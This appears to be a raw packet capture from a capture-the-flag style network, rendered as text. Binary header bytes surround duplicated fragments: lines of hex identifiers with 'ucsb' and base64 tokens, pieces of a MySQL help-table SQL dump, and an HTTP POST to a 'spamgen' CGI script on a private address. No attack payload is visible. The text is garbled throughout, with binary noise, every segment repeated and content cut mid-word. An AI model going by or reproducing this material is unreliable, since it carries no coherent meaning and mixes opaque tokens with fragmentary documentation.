7647D27BE51FE28B19CACA09DE22BF50,ucsb,MTNzEwEDAqtCAU3fojDXGZkR+0suZesGpJqlrg==
40369A654BAB2946AD1D40A1553C9521,ucsb,MTNzEwEDAqzO6UNUTZSCF7mcjXbub/q2qfHD7Q==
BDDB94FE17B2DA4FE5DD3EDA57C94F9A,ucsb,MTNzEwEDAq3UgqumLYeKQ3McnIpjISdTSQHzrg==
C6430FAEE8155CADBCFC81AE158A60DE,ucsb,MTNzEwEDAq4sTDfQ9yTOH3Bo234mr+lKYVFohQ==
9EF95613FA89073354AB810DD397FEF9,ucsb,MTNzEwEDAq+FPBV+6fW68VEuZhUI2H1UGX7qRA==
45330B04004BE9EE9BEB2E430FDDD96B,ucsb,MTNzEwEDArCpe2PNM/jYyTGs4UUtUk/+a7nJJw==
7E73A73DB6BB26D9D21D2F0571BC8C70,ucsb,MTNzEwEDArGEkAn+i+tqqHjZFIEDEN7D5xkDGw==
12A15E0A1B85E085CABC3F530DABEB34,ucsb,MTNzEwEDArKteOo+h7JclPMvS7kZ7jJ9RIcnTQ==
784DBF186BE9E2878F4170EC9EB9028A,ucsb,MTNzEwEDArN6Bk3F3vRq4v8dTBLSZ8+S3eFHNQ==
A04F1D5814682C bb0`BiET@/o0AE< .@@  P2Bb? p bdMEeQ3vYdy/Uoz/0x3XgxdJEA==
2A657EB26111FA579A266ACE8941265C,ucsb,MTNzEwEDAqVC7sEVAuQ/g+Rcd5W8aQOeV0GV3g==
A8D7AA1C8DAE69A53A0E2CE62DDFEF02,ucsb,MTNzEwEDAqZOa0AqXEVyUVYwQrFpxASk6U14IQ==
3F618AA4022C57A0CB90C39BA7B927DB,ucsb,MTNzEwEDAqeaEpXlJBGxSlARCeFdsCKlUYe7WQ==
10B277AF48424324D3FDC83971FDEF41,ucsb,MTNzEwEDAqj6DcEOvObWtSJY4D4LQD70g2HQ2Q==
22610DFB049BFDC6A317D6AB37D9B8D7,ucsb,MTNzEwEDAqkk4KhfbWgHscoJzZ99LWWBZAubpg==
5F56203B6BDE1F15BB72D56B7035566D,ucsb,MTNzEwEDAqoPEGOHYM6HkVbD8F8xDKQdhe7Sdw==
7647D27BE51FE28B19CACA09DE22BF50,ucsb,MTNzEwEDAqtCAU3fojDXGZkR+0suZesGpJqlrg==
40369A654BAB2946AD1D40A1553C9521,ucsb,MTNzEwEDAqzO6UNUTZSCF7mcjXbub/q2qfHD7Q==
BDDB94FE17B2DA4FE5DD3EDA57C94F9A,ucsb,MTNzEwEDAq3UgqumLYeKQ3McnIpjISdTSQHzrg==
C6430FAEE8155CADBCFC81AE158A60DE,ucsb,MTNzEwEDAq4sTDfQ9yTOH3Bo234mr+lKYVFohQ==
9EF95613FA89073354AB810DD397FEF9,ucsb,MTNzEwEDAq+FPBV+6fW68VEuZhUI2H1UGX7qRA==
45330B04004BE9EE9BEB2E430FDDD96B,ucsb,MTNzEwEDArCpe2PNM/jYyTGs4UUtUk/+a7nJJw==
7E73A73DB6BB26D9D21D2F0571BC8C70,ucsb,MTNzEwEDArGEkAn+i+tqqHjZFIEDEN7D5xkDGw==
12A15E0A1B85E085CABC3F530DABEB34,ucsb,MTNzEwEDArKteOo+h7JclPMvS7kZ7jJ9RIcnTQ==
784DBF186BE9E2878F4170EC9EB9028A,ucsb,MTNzEwEDArN6Bk3F3vRq4v8dTBLSZ8+S3eFHNQ==
A04F1D5814682C bbBi0`ET@/p܂Ao0E<0@?LG  3PXItڀ  o)8\n -> \'Don\\\'t!\'\nmysql> SELECT QUOTE(NULL);\n -> NULL',''),(310,'SESSION_USER',25,' SESSION_USER()\n\nSESSION_USER() is a synonym for USER().\n','',''),(311,'QUARTER',14,' QUARTER(date)\nReturns the quarter of the year for date, in the range 1\nto 4.\n','mysql> SELECT QUARTER(\'98-04-01\');\n -> 2',''),(312,'POSITION',23,' POSITION(substr IN str)\n\nPOSITION(substr IN str) is a synonym for LOCATE(substr,str).\n','mysql> SELECT LOCATE(\'bar\', \'foobarbar\');\n -> 4\nmysql> SELECT LOCATE(\'xbar\', \'foobar\');\n -> 0\nmysql> SELECT LOCATE(\'bar\', \'foobarbar\',5);\n -> 7',''),(313,'IS_USED_LOCK',21,' IS_USED_LOCK(str)\nChecks whether the lock named str is in use (that is, locked).\nIf so, it returns the connection identifier of the client that holds\nthe lock.\nOtherwise, it returns NULL.\n','',''),(314,'POLYFROMTEXT',3,' PolyFromText(wkt[,srid])\n PolygonFromText(wkt[,srid])\nConstructs a POLYGON value using its WKT representation and SRID.\n','',''),(315,'DES_ENCRYPT',17,' DES_ENCRYPT(str[,(key_num|key_str)])\n\nEncrypts the string with the given key using the Triple-DES algorithm.\nOn error, this function returns NULL.\n\nNote that this function works only if MySQL has been configured with\nSSL support. SeC ZZBi0`EL@/܂Sŀo0E4Z@?% 3 P֘'t )GÌC ZZBi0`EL@/܂Sŀo0E4\@?# 3 P֝'t )GÌC bbBi0`ET@/9do0E<@?%  P#`߮@C ];_7=wC bb0`BiET@/Ԁo0SE<0@@KG  3PXItڀ  o)8\n -> \'Don\\\'t!\'\nmysql> SELECT QUOTE(NULL);\n -> NULL',''),(310,'SESSION_USER',25,' SESSION_USER()\n\nSESSION_USER() is a synonym for USER().\n','',''),(311,'QUARTER',14,' QUARTER(date)\nReturns the quarter of the year for date, in the range 1\nto 4.\n','mysql> SELECT QUARTER(\'98-04-01\');\n -> 2',''),(312,'POSITION',23,' POSITION(substr IN str)\n\nPOSITION(substr IN str) is a synonym for LOCATE(substr,str).\n','mysql> SELECT LOCATE(\'bar\', \'foobarbar\');\n -> 4\nmysql> SELECT LOCATE(\'xbar\', \'foobar\');\n -> 0\nmysql> SELECT LOCATE(\'bar\', \'foobarbar\',5);\n -> 7',''),(313,'IS_USED_LOCK',21,' IS_USED_LOCK(str)\nChecks whether the lock named str is in use (that is, locked).\nIf so, it returns the connection identifier of the client that holds\nthe lock.\nOtherwise, it returns NULL.\n','',''),(314,'POLYFROMTEXT',3,' PolyFromText(wkt[,srid])\n PolygonFromText(wkt[,srid])\nConstructs a POLYGON value using its WKT representation and SRID.\n','',''),(315,'DES_ENCRYPT',17,' DES_ENCRYPT(str[,(key_num|key_str)])\n\nEncrypts the string with the given key using the Triple-DES algorithm.\nOn error, this function returns NULL.\n\nNote that this function works only if MySQL has been configured with\nSSL support. SeC ZZ0`BiEL@/go0AE4Z@@% 3 P֘'t )GÌC ZZ0`BiEL@/go0AE4\@@# 3 P֝'t )GÌC bbʪBiET@/o0o0oE<@@%  P#`߮@C ];_7=wC ZZBiʪEL@/o0oo0E47@@ P@C#`  7=xg];_C ZZ0`BiEL@/ o09dE47@@  P@C#` 7=xg];_Cm bbBi0`ET@/p܂Ao0E<6@?  3PsK [ p)9column is displayed,\nnot storage. Its values always are stored using four bytes each.\nFrom MySQL 4.0.12, the --new option can be used\nto make the server behave as in MySQL 4.1.\n\nNote that TIMESTAMP(M) columns where M is 8 or 14 are reported to\nbe numbers, whereas other TIMESTAMP(M) columns are reported to be\nstrings. This is just to ensure that you can reliably dump and restore\nthe table with these types.\n','',''),(71,'DES_DECRYPT',17,' DES_DECRYPT(crypt_str[,key_str])\n\nDecrypts a string encrypted with DES_ENCRYPT().\nOn error, this function returns NULL.\n\nNote that this function works only if MySQL has been configured with\nSSL support. See also : [Secure connections].\n\nIf no key_str argument is given, DES_DECRYPT() examines\nthe first byte of the encrypted string to determine the DES key number\nthat was used to encrypt the original string, and then reads the key\nfrom the DES key file to decrypt the message. For this to work,\nthe user must have the SUPER privilege. The key file can be specified\nwith the --des-key-file server option.\n\nIf you pass this function a key_str argument, that string\nis used as the key for decrypting the message.\n\nIf the crypt_str argument doesn\'t look like an encrypted string,\nMySQL returns the given crypt_str.\C bb0`BiET@/Ԁo0SE<6@@  3PsK [ p)9column is displayed,\nnot storage. Its values always are stored using four bytes each.\nFrom MySQL 4.0.12, the --new option can be used\nto make the server behave as in MySQL 4.1.\n\nNote that TIMESTAMP(M) columns where M is 8 or 14 are reported to\nbe numbers, whereas other TIMESTAMP(M) columns are reported to be\nstrings. This is just to ensure that you can reliably dump and restore\nthe table with these types.\n','',''),(71,'DES_DECRYPT',17,' DES_DECRYPT(crypt_str[,key_str])\n\nDecrypts a string encrypted with DES_ENCRYPT().\nOn error, this function returns NULL.\n\nNote that this function works only if MySQL has been configured with\nSSL support. See also : [Secure connections].\n\nIf no key_str argument is given, DES_DECRYPT() examines\nthe first byte of the encrypted string to determine the DES key number\nthat was used to encrypt the original string, and then reads the key\nfrom the DES key file to decrypt the message. For this to work,\nthe user must have the SUPER privilege. The key file can be specified\nwith the --des-key-file server option.\n\nIf you pass this function a key_str argument, that string\nis used as the key for decrypting the message.\n\nIf the crypt_str argument doesn\'t look like an encrypted string,\nMySQL returns the given crypt_str.\C bbBi0`ET@/,|po0E< /@?  P2Gj? ~} edO0A8F9F0B2AF9D291B0E,ucsb,MTNzEwEDArQ+ocV7wiyb2ru1v2fT59doBnfamg==
149D1ECE11CA2BECF190A8D53A1C8128,ucsb,MTNzEwEDArU3wF+S7HoY9dEaFhDBrGnwaPZ8tA==
DF8FDCB5071FBC6623F423A987B5AE7F,ucsb,MTNzEwEDAraEjJkLzB2GX/ep6Y5Ho9nT+gW42w==
588A09A3CB4A192368F02049E82F860D,ucsb,MTNzEwEDAre6joWUjVjk0cwZD82LW+zZOiNqQw==
34DDF42B2A7536F7C9523AB7E9D368B8,ucsb,MTNzEwEDArh/U1esik2Wgi/5VvGBJ6OecZB4Kg==
B5FD81435078D12ED6EF62A9F3A5FA78,ucsb,MTNzEwEDArm6G2MVkN7AexWPtA9sLI1xZb/Vpw==
ECDB7995B7A911478CF28820248D1E19,ucsb,MTNzEwEDArrLUCfaMwFVvecmkkG+0bM1BSVnFw==
80D0DE5A532101A8611F8742DFCDECCA,ucsb,MTNzEwEDArsg8BDONYKgMCYF1hZye4Z307QD8A==
E7B5AF463BF22107398163A58FB248B0,ucsb,MTNzEwEDArwmqGxYZ4QY6d/pzUr/synP5q6obQ==
D5990391656EC9C6720856761B1B9E36,ucsb,MTNzEwEDAr030t9L8gCocxSkZdUDzdjzm+/xmg==
C9693CDDE104E346E63EBC4A7D8987B2,ucsb,MTNzEwEDAr7kkOnFoBkDLlrE100bh0akchSUnA==
90AEB55599C9353A71D992A55687AB47,ucsb,MTNzEwEDAr8jauEP3hfAC8H2ULHi2XBNsvSnng==
35F26930DF9386E0BC8EA1EC079C77EC,ucsb,MTNzEwEDAsBIbhufkuLivYI1M0Jr9vnDkmkjOg==
712B262C4081711DE5F374F72A2091C7,ucsb,MTNzEwEDAsE9Y3Ll/M8BsMhUGeg7kj6uazKjHg==
2829362A3984BB4B94BE102EA0E074F5,ucsb,MTNzEwEDAsLbn852DBjKGNOm2u1knNV4Mt4FTw==
F3D39AD20EE82B60BCAA747FA3712752,ucsb,MTNzEwEDAsO2RBLDKmC ooBiʪEa@/o0oo0EI7@@ P@C#`G 7=xg];_POST /~spamgen/cgi-bin/spamgen.py HTTP/1.1 Host: 10.8.1.3 User-Agent: Mozilla/5.0 (X11; U; Linux i686; rv:1.7.3) Gecko/20041001 Firefox/0.10.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://10.8.1.3/~spamgen/cgi-bin/spamgen.py Content-Type: application/x-www-form-urlencoded Content-Length: 43 C bb0`BiET@/o0AE< /@@  P2Gj? ~} edO0A8F9F0B2AF9D291B0E,ucsb,MTNzEwEDArQ+ocV7wiyb2ru1v2fT59doBnfamg==
149D1ECE11CA2BECF190A8D53A1C8128,ucsb,MTNzEwEDArU3wF+S7HoY9dEaFhDBrGnwaPZ8tA==
DF8FDCB5071FBC6623F423A987B5AE7F,ucsb,MTNzEwEDAraEjJkLzB2GX/ep6Y5Ho9nT+gW42w==
588A09A3CB4A192368F02049E82F860D,ucsb,MTNzEwEDAre6joWUjVjk0cwZD82LW+zZOiNqQw==
34DDF42B2A7536F7C9523AB7E9D368B8,ucsb,MTNzEwEDArh/U1esik2Wgi/5VvGBJ6OecZB4Kg==
B5FD81435078D12ED6EF62A9F3A5FA78,ucsb,MTNzEwEDArm6G2MVkN7AexWPtA9sLI1xZb/Vpw==
ECDB7995B7A911478CF28820248D1E19,ucsb,MTNzEwEDArrLUCfaMwFVvecmkkG+0bM1BSVnFw==
80D0DE5A532101A8611F8742DFCDECCA,ucsb,MTNzEwEDArsg8BDONYKgMCYF1hZye4Z307QD8A==
E7B5AF463BF22107398163A58FB248B0,ucsb,MTNzEwEDArwmqGxYZ4QY6d/pzUr/synP5q6obQ==
D5990391656EC9C6720856761B1B9E36,ucsb,MTNzEwEDAr030t9L8gCocxSkZdUDzdjzm+/xmg==
C9693CDDE104E346E63EBC4A7D8987B2,ucsb,MTNzEwEDAr7kkOnFoBkDLlrE100bh0akchSUnA==
90AEB55599C9353A71D992A55687AB47,ucsb,MTNzEwEDAr8jauEP3hfAC8H2ULHi2XBNsvSnng==
35F26930DF9386E0BC8EA1EC079C77EC,ucsb,MTNzEwEDAsBIbhufkuLivYI1M0Jr9vnDkmkjOg==
712B262C4081711DE5F374F72A2091C7,ucsb,MTNzEwEDAsE9Y3Ll/M8BsMhUGeg7kj6uazKjHg==
2829362A3984BB4B94BE102EA0E074F5,ucsb,MTNzEwEDAsLbn852DBjKGNOm2u1knNV4Mt4FTw==
F3D39AD20EE82B60BCAA747FA3712752,ucsb,MTNzEwEDAsO2RBLDKmC oo0`BiEa@/o09dEI7@@  P@C#`J 7=xg];_POST /~spamgen/cgi-bin/spamgen.py HTTP/1.1 Host: 10.8.1.3 User-Agent: Mozilla/5.0 (X11; U; Linux i686; rv:1.7.3) Gecko/20041001 Firefox/0.10.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://10.8.1.3/~spamgen/cgi-bin/spamgen.py Content-Type: application/x-www-form-urlencoded Content-Length: 43 Ch bbBi0`ET@/,|po0E< 0@?  P2Lr? ֧ edOkO9ZKW+2yzqlBId7QuoQ==
5872A9AD9130437F41302D28FB82AF8D,ucsb,MTNzEwEDAsR5CY33Y1WjABe+AqacTLT+8mmcOA==
DC41446E002463274CC6A21778DE1D0C,ucsb,MTNzEwEDAsUY9Vbf45pVzYXiSvHRqletncgKTQ==
961E79B674F825432ADFA718FF0900CF,ucsb,MTNzEwEDAsZWNQqeFw32tA5G5Cw7IM6cOq+jRA==
78F32909A27A08695D6C1530147C16E5,ucsb,MTNzEwEDAsdi0Dixh60HP6M4LvX40xbf7ehX4g==
13F9C0D253AFC1020276D984F1D81EA6,ucsb,MTNzEwEDAsie3Av22euoG2akKPAiXvyQJ8ggZg==
95B56494227308835F7E717E5D0BAE1B,ucsb,MTNzEwEDAsnxkEcRTPbUscSi2HdfDVpT0dM4Ww==
58582085C2648D68B0272F62AC9B7847,ucsb,MTNzEwEDAsoU26HlaxX7c/gxXy388zMPt0RPXg==
E5F70901947568E18005A579791816F4,ucsb,MTNzEwEDAsurW9jN6+/ua8Fqg0kiqmRsv7Y46w==
4C3B6B55CF8440E09B45E8FF56455BBA,ucsb,MTNzEwEDAszblxqX/DA8qkhD6oRSQsdl6tZiyA==
3387B3F6AADBB3B230DFD37B56210B3E,ucsb,MTNzEwEDAs3taply0XxDXANFxrARor8kvDmlTQ==
B4FCBC68D867E4E7B798A94404FC79E2,ucsb,MTNzEwEDAs6Bo+cwCmnkhANRZBd+Kqog17jJbA==
3387FBC6553AFFBAF2B88C9C0F4399F8,ucsb,MTNzEwEDAs9PPBgT7UR5lLycPcADM4TMKtZPKQ==
85D0783691674B1CC2522A7F9DFA76DD,ucsb,MTNzEwEDAtC806M15bEqvszjLGgClTTbW4cJDw==
50282224AB0F5A56B645F6481B198C81,ucsb,MTNzEwEDAtEnPRiaROdPEbTxbNFOTherio/PGA==
9FDB6A9BBACC5A267A5402EC7CA3ECDB,ucsb,MTNzEwEDAtJKFRZnf12v12dp567i6hcWEYSXqQ==
4958308DB13D03D8C bb0`BiET@/o0AE< 0@@  P2Lr? ֧ edOkO9ZKW+2yzqlBId7QuoQ==
5872A9AD9130437F41302D28FB82AF8D,ucsb,MTNzEwEDAsR5CY33Y1WjABe+AqacTLT+8mmcOA==
DC41446E002463274CC6A21778DE1D0C,ucsb,MTNzEwEDAsUY9Vbf45pVzYXiSvHRqletncgKTQ==
961E79B674F825432ADFA718FF0900CF,ucsb,MTNzEwEDAsZWNQqeFw32tA5G5Cw7IM6cOq+jRA==
78F32909A27A08695D6C1530147C16E5,ucsb,MTNzEwEDAsdi0Dixh60HP6M4LvX40xbf7ehX4g==
13F9C0D253AFC1020276D984F1D81EA6,ucsb,MTNzEwEDAsie3Av22euoG2akKPAiXvyQJ8ggZg==
95B56494227308835F7E717E5D0BAE1B,ucsb,MTNzEwEDAsnxkEcRTPbUscSi2HdfDVpT0dM4Ww==
58582085C2648D68B0272F62AC9B7847,ucsb,MTNzEwEDAsoU26HlaxX7c/gxXy388zMPt0RPXg==
E5F70901947568E18005A579791816F4,ucsb,MTNzEwEDAsurW9jN6+/ua8Fqg0kiqmRsv7Y46w==
4C3B6B55CF8440E09B45E8FF56455BBA,ucsb,MTNzEwEDAszblxqX/DA8qkhD6oRSQsdl6tZiyA==
3387B3F6AADBB3B230DFD37B56210B3E,ucsb,MTNzEwEDAs3taply0XxDXANFxrARor8kvDmlTQ==
B4FCBC68D867E4E7B798A94404FC79E2,ucsb,MTNzEwEDAs6Bo+cwCmnkhANRZBd+Kqog17jJbA==
3387FBC6553AFFBAF2B88C9C0F4399F8,ucsb,MTNzEwEDAs9PPBgT7UR5lLycPcADM4TMKtZPKQ==
85D0783691674B1CC2522A7F9DFA76DD,ucsb,MTNzEwEDAtC806M15bEqvszjLGgClTTbW4cJDw==
50282224AB0F5A56B645F6481B198C81,ucsb,MTNzEwEDAtEnPRiaROdPEbTxbNFOTherio/PGA==
9FDB6A9BBACC5A267A5402EC7CA3ECDB,ucsb,MTNzEwEDAtJKFRZnf12v12dp567i6hcWEYSXqQ==
4958308DB13D03D8Ca ZZBi0`EL@/܂Sŀo0E4\7@?H 3 Pu}UĀ$& )HCj ZZBi0`EL@/܂Sŀo0E4^@?! 3 P֢'t )HÌC ZZ0`BiEL@/go0AE4\7@@H 3 Pu}UĀ$& )HC ZZ0`BiEL@/go0AE4^@@! 3 P֢'t )HÌC bbBi0`ET@/p܂Ao0E<6@?  3PxS  q)9n','',''),(72,'CHECKSUM',7,'\nReports a table checksum.\n\nIf QUICK is specified, the live table checksum is reported if it is\navailable, or NULL otherwise. This is very fast. A live checksum\nis enabled by specifying the CHECKSUM=1 table option, currently\nsupported only for MyISAM tables.\nSee also : [CREATE TABLE, , CREATE TABLE].\n\nIn EXTENDED mode the whole table is read row by row and the checksum\nis calculated. This can be very slow for large tables.\n\nBy default, if neither QUICK nor EXTENDED is specified, MySQL\nreturns a live checksum if the table storage engine supports it and scans\nthe table otherwise.\n\nCHECKSUM TABLE returns NULL for non-existent tables.\nAs of MySQL 5.0.3, a warning is generated for this condition.\n\nThis statement is implemented in MySQL 4.1.1.\n\n\n @subsubsection OPTIMIZE TABLE Syntax\n\n\n\n\nOPTIMIZE [LOCAL | NO_WRITE_TO_BINLOG] TABLE tbl_name [, tbl_name] ...\n\nOPTIMIZE TABLE should be used if you have deleted a large part of a\ntable or if you have made many changes to a table with variable-length rows\n(tables that have VARCHAR, BLOB, or TEXT columns).\nDeleted records are maintained in a linked list and subsequent INSERT\noperations reuse old record positions. You can use OPTIMIZE TABLE to\nreclaim the unused space C bb0`BiET@/Ԁo0SE<6@@  3PxS  q)9n','',''),(72,'CHECKSUM',7,'\nReports a table checksum.\n\nIf QUICK is specified, the live table checksum is reported if it is\navailable, or NULL otherwise. This is very fast. A live checksum\nis enabled by specifying the CHECKSUM=1 table option, currently\nsupported only for MyISAM tables.\nSee also : [CREATE TABLE, , CREATE TABLE].\n\nIn EXTENDED mode the whole table is read row by row and the checksum\nis calculated. This can be very slow for large tables.\n\nBy default, if neither QUICK nor EXTENDED is specified, MySQL\nreturns a live checksum if the table storage engine supports it and scans\nthe table otherwise.\n\nCHECKSUM TABLE returns NULL for non-existent tables.\nAs of MySQL 5.0.3, a warning is generated for this condition.\n\nThis statement is implemented in MySQL 4.1.1.\n\n\n @subsubsection OPTIMIZE TABLE Syntax\n\n\n\n\nOPTIMIZE [LOCAL | NO_WRITE_TO_BINLOG] TABLE tbl_name [, tbl_name] ...\n\nOPTIMIZE TABLE should be used if you have deleted a large part of a\ntable or if you have made many changes to a table with variable-length rows\n(tables that have VARCHAR, BLOB, or TEXT columns).\nDeleted records are maintained in a linked list and subsequent INSERT\noperations reuse old record positions. You can use OPTIMIZE TABLE to\nreclaim the unused space CO ZZBi0`EL@/܂Sŀo0E4`@? 3 P֧'t )HČCg ZZ0`BiEL@/go0AE4`@@ 3 P֧'t )HČC bbBi0`ET@/p܂Ao0E<1@?LF  3PXQtڀ  t)9e also : [Secure connections].\n\nThe encryption key to use is chosen based on the second argument to\nDES_ENCRYPT(), if one was given:\n\n Argument Description\n No argument \nThe first key from the DES key file is used.\n key_num \nThe given key number (0-9) from the DES key file is used.\n key_str \nThe given key string is used to encrypt str.\n \n\nThe key file can be specified with the --des-key-file server option.\n\nThe return string is a binary string where the first character\nis CHAR(128 | key_num).\n\nThe 128 is added to make it easier to recognize an encrypted key.\nIf you use a string key, key_num is 127.\n\nThe string length for the result is\nnew_len = orig_len + (8-(orig_len % 8))+1.\n','key_num des_key_str',''),(316,'LENGTH',23,' LENGTH(str)\nReturns the length of the string str, measured in bytes.\nA multi-byte character counts as multiple bytes.\nThis means that for a string containing five two-byte characters,\nLENGTH() returns 10, whereas CHAR_LENGTH() returns\n5.\n','mysql> SELECT LENGTH(\'text\');\n -> 4',''),(317,'DISTANCE',11,' Distance(g1,g2)\nReturns as a double-precision number\nthe shortest distance between any two points in the two geometries.\n','',''),(318,'STR_TO_DATE',14,' STR_TO_DATE(str,format)\nThis is C ZZBi0`EL@/܂Sŀo0E4b@? 3 P֬ƀ't~{ )HČC ZZBi0`EL@/܂Sŀo0E4@?sh 3 ;PDv )HyC bb0`BiET@/Ԁo0SE<1@@KF  3PXQtڀ  t)9e also : [Secure connections].\n\nThe encryption key to use is chosen based on the second argument to\nDES_ENCRYPT(), if one was given:\n\n Argument Description\n No argument \nThe first key from the DES key file is used.\n key_num \nThe given key number (0-9) from the DES key file is used.\n key_str \nThe given key string is used to encrypt str.\n \n\nThe key file can be specified with the --des-key-file server option.\n\nThe return string is a binary string where the first character\nis CHAR(128 | key_num).\n\nThe 128 is added to make it easier to recognize an encrypted key.\nIf you use a string key, key_num is 127.\n\nThe string length for the result is\nnew_len = orig_len + (8-(orig_len % 8))+1.\n','key_num des_key_str',''),(316,'LENGTH',23,' LENGTH(str)\nReturns the length of the string str, measured in bytes.\nA multi-byte character counts as multiple bytes.\nThis means that for a string containing five two-byte characters,\nLENGTH() returns 10, whereas CHAR_LENGTH() returns\n5.\n','mysql> SELECT LENGTH(\'text\');\n -> 4',''),(317,'DISTANCE',11,' Distance(g1,g2)\nReturns as a double-precision number\nthe shortest distance between any two points in the two geometries.\n','',''),(318,'STR_TO_DATE',14,' STR_TO_DATE(str,format)\nThis is C ZZ0`BiEL@/go0AE4b@@ 3 P֬ƀ't~{ )HČC ZZ0`BiEL@/Eo0lE4@@rh 3 ;PDv )HyC bbBi0`ET@/,|po0E< 1@?  P2Qz? X hdQEBC0480972A3B51F,ucsb,MTNzEwEDAtOkpS10D2SN4HHblhULvMSffo8RiQ==
E13233BA05F8DEDC4F6BF3AB51F17056,ucsb,MTNzEwEDAtQwDEuXKP2EvcVu/eDzaWGChN3rwA==
B375CC7055C6EB05C6E1EEDAC52D8DF9,ucsb,MTNzEwEDAtVi8lC+xYRQO2BWKFuCnMthT/czxg==
ADCDC3E9D763E7358AC9FEBFDA777A73,ucsb,MTNzEwEDAtbo5Mq3DJ1gxLjrmZ3YYGQDkterHg==
EB891D26EFB84C98642CE54A69351FEA,ucsb,MTNzEwEDAtctazu4UOSx7IpgW6OGzuUZ0NeJbg==
DB42EA29469241CC9E06B26E6BAB194C,ucsb,MTNzEwEDAtgLhx+omPnbo3qdjgtS6LXEPZynbg==
61A546DCF538183CDE9FCF0A6287AFC3,ucsb,MTNzEwEDAtljbE1ljjNjKl1boG8AwF7PPr0QEA==
0D6623638359A71C0088C409D6999C1D,ucsb,MTNzEwEDAtoLNRwxN/pi5UCzTKnYuLaKBieIQA==
5B6FFDD490F1CD418F50B10A5418AA87,ucsb,MTNzEwEDAttx0zUNpqM5R83cLb2EXPbXdYIsrg==
8AC2CF44BFF525BF4F9B1C36689EC92F,ucsb,MTNzEwEDAtzjZT62a000k6GGiOEqwSNE7uMhvA==
E8C21A70B6D2AFD5169B5FFE6C0F5834,ucsb,MTNzEwEDAt2yYzle3MBFeC5ZEVud89EkBF3CZw==
BC725E0AE01BD3FB33E3C2D441CDB069,ucsb,MTNzEwEDAt71LcJ1Ta8BrUNGyKTY+0QrJdQ7GQ==
7C6C0292AA1E437205CA2189E17A70FC,ucsb,MTNzEwEDAt/piulmNR9mVR90/JZjREq5TePxiQ==
2938B4D3D02BBA8991B7D8DB5CFC65E2,ucsb,MTNzEwEDAuCsNZrNS2luQfXGcUNehboLZKHC/A==
FD0791DF553DB6C808F9DEEA553696B7,ucsb,MTNzEwEDAuFeOiWTVEKkvtvY3rAdhsU/SUBcRA==
49F5BAC1CE4A37A822DA1AD9D58F5728,ucsb,MTNzEwEDAuLfH5ALjgn5TC bb0`BiET@/o0AE< 1@@  P2Qz? X hdQEBC0480972A3B51F,ucsb,MTNzEwEDAtOkpS10D2SN4HHblhULvMSffo8RiQ==
E13233BA05F8DEDC4F6BF3AB51F17056,ucsb,MTNzEwEDAtQwDEuXKP2EvcVu/eDzaWGChN3rwA==
B375CC7055C6EB05C6E1EEDAC52D8DF9,ucsb,MTNzEwEDAtVi8lC+xYRQO2BWKFuCnMthT/czxg==
ADCDC3E9D763E7358AC9FEBFDA777A73,ucsb,MTNzEwEDAtbo5Mq3DJ1gxLjrmZ3YYGQDkterHg==
EB891D26EFB84C98642CE54A69351FEA,ucsb,MTNzEwEDAtctazu4UOSx7IpgW6OGzuUZ0NeJbg==
DB42EA29469241CC9E06B26E6BAB194C,ucsb,MTNzEwEDAtgLhx+omPnbo3qdjgtS6LXEPZynbg==
61A546DCF538183CDE9FCF0A6287AFC3,ucsb,MTNzEwEDAtljbE1ljjNjKl1boG8AwF7PPr0QEA==
0D6623638359A71C0088C409D6999C1D,ucsb,MTNzEwEDAtoLNRwxN/pi5UCzTKnYuLaKBieIQA==
5B6FFDD490F1CD418F50B10A5418AA87,ucsb,MTNzEwEDAttx0zUNpqM5R83cLb2EXPbXdYIsrg==
8AC2CF44BFF525BF4F9B1C36689EC92F,ucsb,MTNzEwEDAtzjZT62a000k6GGiOEqwSNE7uMhvA==
E8C21A70B6D2AFD5169B5FFE6C0F5834,ucsb,MTNzEwEDAt2yYzle3MBFeC5ZEVud89EkBF3CZw==
BC725E0AE01BD3FB33E3C2D441CDB069,ucsb,MTNzEwEDAt71LcJ1Ta8BrUNGyKTY+0QrJdQ7GQ==
7C6C0292AA1E437205CA2189E17A70FC,ucsb,MTNzEwEDAt/piulmNR9mVR90/JZjREq5TePxiQ==
2938B4D3D02BBA8991B7D8DB5CFC65E2,ucsb,MTNzEwEDAuCsNZrNS2luQfXGcUNehboLZKHC/A==
FD0791DF553DB6C808F9DEEA553696B7,ucsb,MTNzEwEDAuFeOiWTVEKkvtvY3rAdhsU/SUBcRA==
49F5BAC1CE4A37A822DA1AD9D58F5728,ucsb,MTNzEwEDAuLfH5ALjgn5TC bbBi0`ET@/,|po0E< 2@?  P2V? /m hdQOPIhSZYa6omvWBbaw==
20ACE8B605CDFDC3597C3086E0390130,ucsb,MTNzEwEDAuO97aQCf6qmJ/1tuk4AMuYnIVnPyQ==
8D2FE5350A73BB4709496FC856D58D32,ucsb,MTNzEwEDAuQfs8M/BFbt4IwfBr8bjI9gMjE7zg==
483F56CC9974E3ADC405E0119B753BEE,ucsb,MTNzEwEDAuVVUt71GhbPfOAmav8Aw++IiU1D7g==
658C13190F57443F416756929B57CF45,ucsb,MTNzEwEDAuYVeIMa6VoIN9Hjhdhjo+oaV51AQA==
3A804ACFA7E8FD0875CFADEE2558E4D4,ucsb,MTNzEwEDAueLZ5WsiMJPJUYi/jGfoM72v6ryig==
6E1DA75C2B50DF414C887F3E4D16FA15,ucsb,MTNzEwEDAuiAuMdj96nTt12ecabQGplvOCOyZQ==
436CA861D94F28B896A3B52044C253F0,ucsb,MTNzEwEDAunXVOyf4lKwzcXLki/4ji2R6tdGdw==
1E0FD6E2C987A6964E4F0A182DBCD5B2,ucsb,MTNzEwEDAuqPzkDg0nQmrBtZ4Eb5SVxVdq534A==
714BF75C1E7BDCFB24C1A8AA4A78BA9B,ucsb,MTNzEwEDAuuCgi5TdPN1bkGrKGNuaP+WrNwzQg==
87E92067EC978679A56195318AE69C49,ucsb,MTNzEwEDAuy/J0XZKTyskAU9gm6FsJ6dvbknqQ==
FCE3C37A26F4AF58668B549230631351,ucsb,MTNzEwEDAu0rZazb5vlxPEAC7iPcXvuwTg5g+Q==
